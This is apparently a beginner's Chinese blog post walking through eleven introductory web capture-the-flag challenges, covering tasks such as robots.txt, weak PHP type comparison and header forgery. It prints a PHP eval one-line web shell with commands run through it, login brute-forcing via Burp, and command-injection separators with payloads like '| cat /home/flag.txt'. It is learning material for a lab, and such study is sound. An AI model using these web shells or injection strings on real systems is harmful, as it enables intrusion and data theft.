攻防世界web新手区(来自小白)*-*

鄙人是个纯纯的小白,这个博客也是给小白写的,不过大佬们也不会来查这些题的wp吧

拍飞



攻防世界WEB新手区(1–11)

第一题view_source

根据题目描述 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了 ,鼠标右键不管用,可以 Ctrl+U 查看网页源代码,即可得到flag。


第二题robots

根据题目描述 X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧

robots是网站跟爬虫间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限,也就是说robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在 robots.txt ,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。

在地址栏中输入 robots.txt,得到信息:f1ag_1s_h3re.php,在地址栏输入f1ag_1s_h3re.php,得到flag。


第三题backup

根据题目描述 X老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧

打开环境,出现:你知道index.php的备份文件名吗? ,使用御剑扫描得到 index.php.bak ,打开保存文件并查看源码,得到flag。


第四题cookie

根据题目描述 X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:‘这是夹心饼干的意思吗?’

按F12(有些电脑需要Fn+F12),点击网络,在cookie中找到 look-here:"cookie.php" ,打开后得到flag。


第五题disabled_button

根据题目描述 X老师今天上课讲了前端知识,然后给了大家一个不能按的按钮,小宁惊奇地发现这个按钮按不下去,到底怎么才能按下去呢?

F12后删去disable,得到flag。


第六题weak_auth

根据题目描述 小宁写了一个登陆验证页面,随手就设了一个密码

随便输入用户名,得到提示,用户名为admin,随便输入密码,使用burp抓包,将密码设置为变量,导入字典得到密码,即可得到flag。

当然,你也可以自己写脚本抓包。


第七题simple_php

根据题目描述 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码 ,打开题目可知此题为php弱类型。

<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){
    echo $flag1;
}
if(is_numeric($b)){
    exit();
}
if($b>1234){
    echo $flag2;
}
?> 

地址栏数变量a、b,根据题目a输入非数字的任何字符,b输入一大于1234的数字+非数字的字符。此时,第一次判断时将a转化为数字为0,符合条件;b的值可跳过第二条判断;b转化为数字后大于1234,则第三次判断成立,得到flag。


第八题get_post

根据题目描述 * X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?*
首先,我们需要了解get和post两种请求的区别。

https://www.jianshu.com/p/a5cdfd2bda66
这里是别人解释的

了解了二者的区别后,我们打开题目, 请用GET方式提交一个名为a,值为1的变量 ,这里可以直接在地址栏中提交。提交之后,会出现 请再以POST方式随便提交一个名为b,值为2的变量 ,因为我之前装了hackbar,所以我可以直接F12进入调试模式,进入hackbar直接提交即可得到flag。


注:hackbar进入2.1.3版本后开始收费,这里有一安装方法可跳过收费版本。
https://blog.csdn.net/wdsj_xh/article/details/97511285


第九题xff_referer

根据题目描述 X老师告诉小宁其实xff和referer是可以伪造的 可知本题需要我们伪造xff和referer。

打开场景,ip地址必须为123.123.123.123,***X-Forwarded-For:123.123.123.123***伪造成功后出现:必须来自https://www.google.com,Referer:https://www.google.com,即可得到flag。

之前看视频有大佬直接在hackbar上就可以进行xff与referer的伪造,但是我的就不行,有大佬可以帮解决一下吗?


第十题webshell

根据题目描述 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里PHP一句话,是一段PHP木马代码,也就是我们所说的后门程序,这段代码属于基础类的一句话,功能仅限于验证漏洞了,实际中太容易被查出来了,这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。

<?php @eval($_POST['shell']);?>

eval()_将字符串按照PHP代码来执行,该字符串必须是合法的 PHP 代码,且必须以分号结尾,如果没有在代码字符串中调用 return 语句,则返回 NULL,如果代码中存在解析错误,则 eval() 函数返回 false。

解法一 hackbar

打开hackbar,使用post,输入 shell=phpinfo(); 发现可执行。接着输入 shell=system(“ls”); ,界面上出现flag.txt index.php,接着使用 shell=system(“cat flag.txt”); 语句打开文件即可得到flag。

解法二 蚁剑

https://www.fujieace.com/hacker/tools/antsword.html
这是一个下载安装蚁剑的教程

右键添加数据,密码为shell。

在这之后有两种方法

法一:测试连接,右键虚拟终端,输入指令 lscat flag.txt 即可得到flag。
法二:直接打开刚刚所添加的数据,打开flag文件便可得到flag。

对于指令不熟悉的朋友们推荐使用法二,图形化界面更便于操作,对新手比较友好


第十一题command_execution

根据题目描述 小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗

ping功能是DOS命令,一般用于检bai测网络通与不du通。
PING (Packet Internet Grope),因特网包探索器,用于测试网络连接量的程zhi序。daoPing发送一个ICMP回声清求消息给目的地并报告是否收到所希望的ICMP回声应答。
它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。
Ping 是Windows系列自带的一个可执行命令。利用它可以检查网络是否能够连通,用好它可以很好地帮助我们分析判定网络故障。应用格式:Ping IP地址。该命令还可以加许多参数使用,具体是键入Ping按回车即可看到详细说明。

WAF:Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

解法一_直接在浏览器上完成

首先测试所有的截断符号:
‘$’
‘;’
‘|’
‘-’
‘(’
‘)’
‘反引号’
‘||’
‘&&’
‘&’
‘}’
‘{’
'%0a’可以当作空格来用;

这里我试出来**|| id**、| id& id,对于每个人可能都不同。
接着搜索flag:& find / -name “flag*”| find / -name “flag*”|| find / -name "flag*"均可。
此时会出现
/home/flag.txt
**,读取文件**& cat /home/flag.txt**、| cat /home/flag.txt|| cat /home/flag.txt,得到flag,其中,cat也可换为tac。

解法二_使用burp抓包

与在浏览器操作相同。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值